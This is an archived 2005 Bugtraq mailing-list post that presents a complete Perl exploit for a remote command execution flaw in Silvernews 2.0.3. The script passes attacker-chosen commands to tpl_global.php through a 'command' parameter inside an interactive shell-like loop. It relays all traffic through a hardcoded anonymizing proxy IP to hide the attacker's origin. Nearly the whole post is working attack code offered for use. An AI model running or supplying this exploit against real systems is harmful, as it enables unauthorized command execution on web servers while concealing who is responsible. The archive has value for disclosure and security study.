lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050805171518.12928.qmail@securityfocus.com>
Date: 5 Aug 2005 17:15:18 -0000
From: tsl@...urityfocus.com, "[at]"@securityfocus.com,
	hackermail.com@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 remote command execution exploit, proxy server
 support!


Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------



#!/usr/bin/perl

################TSL###########################################################
#
#
# SilverNews Exploit inlcuded Proxy Server Function
# THROAT SECURITY LABS
#
#  vuln:  http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################

$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;

#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anoynmity proxy

use IO::Socket;

sub sploit()
{

 $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
 Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 80\n";

 print $sock "GET $target/$location/templates/tpl_global.php?command=$command HTTP/1.1$l";

 print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
 print $sock "Connection: close$l";

while (<$sock>) {

    if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
	print "Error! Got HTTP return code $1. Exciting!\n";
	exit 1;

    }

    print if $t==1;
    $t=1 if /^$l$/;

 }

}

if (@ARGV != 2)

{

 print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
 print "-------------------------------------------------------\n\n";
 print "* usage:\t $0 [target] [path] \n";
 print "* example:\t $0 www.target.com newssystem \n";
 print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

 $target     = $ARGV[0];
 $location   = $ARGV[1];

 print "sending exploit ... please wait\n";
 sleep(1);

while(1){

   print "[sploit\@$target:/$location\] ";
   $_=<STDIN>;
   chop;
   next if /^$/;
   s/ /%20/;
   #if ($command=="exit") {exit} else {sploit()};
   $command=$_;
   sploit();

   }

}

#EOF#



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ